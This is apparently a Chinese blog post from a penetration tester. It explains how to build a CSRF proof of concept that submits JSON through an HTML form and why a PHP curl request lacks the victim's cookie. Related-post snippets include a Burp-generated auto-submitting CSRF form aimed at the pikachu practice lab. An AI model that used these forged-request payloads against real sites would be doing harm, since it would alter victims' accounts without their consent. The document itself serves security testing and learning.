html5表单提交json数据库,CSRF漏洞中以form形式用POST方法提交json数据的POC

最新推荐文章于 2022-12-04 19:58:27 发布
最新推荐文章于 2022-12-04 19:58:27 发布
阅读量714 收藏
点赞数
文章标签: html5表单提交json数据库
本文详细介绍了在进行CSRF测试时如何构造POST数据来避免特定问题。通过利用JSON格式的特性,成功摆脱了在form提交中出现的等号问题。同时,文章探讨了PHP发起的CSRF请求为何会失败,因为PHP作为后端语言无法携带用户cookie,导致CSRF验证失败。作者通过学习和实践,理解了浏览器发出请求与后端语言发起请求在CSRF场景中的区别。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

0x01 写在前面

今天遇到的,查了很多资料,发现这种形式的基本上没看到,圈子里某个师傅发了一个国外的链接,

参考了一下,最后成功构造poc。

0x02 POC

form提交post数据很简单,如下:

This i a CSRF test!

但是这种方式存在缺陷,如下图:

cc0f485c0b8d099f6478d93c10384202.png

始终有个“=”摆脱不了,但是用下面这种方式成功摆脱:

This i a CSRF test!

69f22c3c4d0de94795d7669ea20b59b6.png

这里的技巧主要在于name和value的值共同构成了json格式的值,利用了双引号的闭合,学到了,以后有很多测试都可以用着这方式测试,所以记下来。

0x03 题外话

本来一开始利用form怎么都构造不成,后来放弃,然后使用php中的curl功能来写:<?php

$data = array("attributes" =>

array("name"=> "test2@test.com",

"userName" => "测试2",

"password" => "e10adc3949ba59abbe56e057f20f883e",

"role" => "user",

"status" => "enabled",

"phone" => ""

));

$data_string = json_encode($data);

$ch = curl_init('http://xxx.com/db/adds');

curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");

curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(

'Content-Type: application/json',

'Content-Length: ' . strlen($data_string))

);

$result = curl_exec($ch);

echo $data_string;

?>

b2e57ef3f4cdac11dae2aca21987320c.png

抓包处理的时候发现依旧不行,并没有执行CSRF。(并不存在referer和token的前提)

具体原因现在依旧不清楚,于是求租,然后有大师傅解释:你如果用PHP写CSRF的POC是会失败的。CSRF本质是浏览器发出请求后会自带cookie. PHP是后端语言,

也就是请求不是浏览器发出去的。而后端服务器无法获取当前用户的cookie,

所以发出的POST请求没有cookie,CSRF就成功不了

所以有些懵逼。

然后又询问了一下大师傅,终于明白。

我上面的Php代码,POST请求是由php发出的,php代码运行后,返回一个数据页面给浏览器,然后浏览器在呈现给用户,此时由于是后端语言php发出的请求,后端服务器没法获得当前用户的cookie,所以没办法csrf。

而p牛的那个例子,POST请求是由js发出

b8b315b9efceaef49dd0e49526b55ba1.png

也就是浏览器发出,所以可以获得当前用户的cookie。

不得不说,小技巧里面的知识可不小~还需努力啊

Travel Back
关注
java json发送文件_Java HttpClient 发送multipart/form-data带有Json文件的Post请求
weixin_35734364的博客
02-28 1142
Java HttpClient 发送multipart/form-data带有Json文件的Post请求说明:发送multipart/form-data带有Json文件的Post请求,文件内容其实就是json字符串,这种请求之前都是通过postman发的,见postman截图:目前但是要做接口自动化测试,所以须用代码实现。直接贴代码:(需要至少2个jar包:httpclient-4.5.3.jar...
谈谈Json格式下的CSRF攻击
Coisini的博客
06-27 4751
一、CSRF漏洞简介 csrf漏洞的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)。这个操作不是用户真正想要执行的。 在post标准化格式(accounts=test&password...
html对应的文件中 将form 表单数据 转化为json 格式
06-10
Jquery中使用ajax,表单post提交数据 插入oracle数据库html对应的文件中 将form 表单数据 转化为json 格式
json数据格式的CSRF PoC构造
weixin_46137328的博客
05-07 1082
在测试的过程中,不做CSRF防护的网站很多,防护CSRF一般有如下三种方式:1)用户操作验证,在提交数据时需要输入验证码2)请求来源验证,验证请求来源的referer3)表单token验...
HtmlForm 表单形式 发送 POSTJSON格式) 的数据
u013646034的博客
01-06 3万+
这里一定要注意几点:
Web表单提交漏洞
bocai_xiaodaidai的博客
12-20 2037
一、漏洞的存在 某些网站服务端存在权限校验漏洞,使得前端可以随意提交任何表单信息。 二、漏洞演示 1、以下是某网站表单信息。对于普通用户是无法提交表单信息的,该网站仅仅隐藏了提交按钮,但内容仍可编辑。 可以通过尝试直接在浏览器的html中加入<button type='submit'>来提交。如何该网站服务端没有设置相应提交权限,则会修改成功。 2、以下是另一个网站...
CSRF漏洞详解 一文了解CSRF漏洞
闵行小鱼塘
11-11 2710
本篇总结归纳CSRF漏洞
一次渗透测试引发Json格式下的CSRF攻击
0xdawn的博客
06-24 1482
0x00 前言 漏洞背景 hw时期在电信三巨头之一旗下的子公司出差,做一下渗透测试。公网的业务主挖逻辑漏洞,但是每次挖着挖着就变成了CSRF攻击,出差半个月算是把这辈子的CSRF都给挖完了。 testme师傅说的一句话:开发者修或不修,挖洞者觉得鸡肋不鸡肋,CSRF漏洞就躺着那里。这一次的体会很深,某云基本所有的业务逻辑都存在CSRF洞。 CSRF原理 还是来梳理一下大致的流程 1.用户C浏览并登录信任网站A 2.验证通过,Web A产生一个Cookie返回给用户C 3.用户在没有等处的情况下访问Web
CSRF漏洞剖析
zmzsg100的专栏
12-04 978
CSRF的前世今生
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action=" http://www.pikachu.com/vul/csrf/csrfget/csrf_get_edit.php "> <input type="hidden" name="sex" value="boy" /> <input type="hidden" name="phonenum" value="11111111111111" /> <input type="hidden" name="add" value="ttaaaaaaaaa" /> <input type="hidden" name="email" value="666@.com" /> <input type="hidden" name="submit" value="submit" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>这个csrf访问链接怎么样才能使得表单提交后再进行页面跳转到百度网页,注意我需要他成功提交表单数据之后再跳转,不允许出现跳转成功后表单数据提交完成的情况
最新发布
03-27
### 实现 CSRF 表单提交完成后的重定向 为了在 CSRF 攻击防护机制下实现表单提交并成功跳转至指定页面(如百度),可以按照以下方式设计逻辑: #### 1. **Django 中处理 AJAX 表单提交** 当通过 Django 进行 AJAX ...
举例详解HTML5中使用JSON格式提交表单
09-28
主要介绍了举例详解HTML5中使用JSON格式提交表单,包括多重数组嵌套等方法的使用演示,需要的朋友可以参考下
form提交post请求无法兼容json格式的参数
FJPNB的博客
12-10 2653
BUG日记 ——form提交post请求无法兼容json格式的参数 最近两天一直被一个bug拖慢开发进度,具体情况是关于form表单提交时的的传参格式问题 具体的需求是通过form表单提交相应的参数条件,然后后端以表单的参数为筛选条件,返回一个excel表格,后端实现方法不做介绍,主要介绍前端部分出现的问题: 后端给出的接口如下: 接口意思就是传参格式为json,url为http://pass/carorder/exportOrderCheckList 以下为前端模拟的代码 <form
html5表单提交json数据库,举例详解HTML5中使用JSON格式提交表单
weixin_33069291的博客
06-04 535
这篇文章主要介绍了举例详解HTML5中使用JSON格式提交表单,包括多重数组嵌套等方法的使用演示,需要的朋友可以参考下以JSON编码格式提交表单数据HTML5对WEB发展进化的又一大贡献,以前我们的HTML表单数据是通过key-value方式传输的服务器端,这种形式的传输对数据组织缺乏管理,形式十分原始。而新出现的JSON格式提交表单数据方法,将表单里的所有数据转化的具有一定规范的JSON格式,...
htmlform提交json,提交表单将返回application / json而不是text / html
weixin_33506900的博客
06-28 798
I have changed a Get submit using:To:@using(Html.BeginForm(null, null, FormMethod.Post, new { id = "homeCategoryForm" })){@Html.AntiForgeryToken()@Html.Hidden("ids")@Html.Hidden("categoryId")@Html.Hid...
html5 绑定json数据,使用jquery和html5 post json格式数据
weixin_34769715的博客
06-04 283
(function($) {functiontoIntegersAtLease(n)// Format integers to have at least twodigits.{return n < 10 ? '0' + n :n;}Date.prototype.toJSON =function(date)// Yes, it polutes the Date namespace, but ...
JSON和文件上传
普通人一枚
02-26 4878
JSON 1.1. JSON简介 JSON是一种轻量级的数据传输格式,解析简单 方便阅读 JSON中支持的数据类型:string,数值,布尔,JSON对象,数组,null 语法: key :value 上下键值对之间使用逗号隔开 KEY使用双引号引起来,字符串类型的数据都是使用双引号引起来 对象使用{} 数组使用[ ] 1.2.Java对JSON的处理 Java中并没有内置JSON的解析,因此使用JSON需要借助第三方类库。 下面是几个常用的 JSON 解析类库: Gson: 谷歌开
form表单提交json格式数据
热门推荐
另一个世界
09-04 8万+
参考自 jQuery实现ajax提交form表单(可以是提交json),用springmvc接收。图文详解个人实践整理。方式一:发送数据<script type="application/javascript"> //发送表单ajax请求 $(':submit').on('click',function(){ $.ajax({ url:"bu
from 表单post方式提交,返回json数据
内沐的博客
03-17 1万+
action=”mvc/dangerApproval/safety_app_save” 如果aciton请求后不加.json Content-Type:application/x-www-form-urlencoded; charset=UTF-8 可以看到:默认是x-www-form-urlencoded. 后台数据返回格式,如下 Content-Type:ap
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值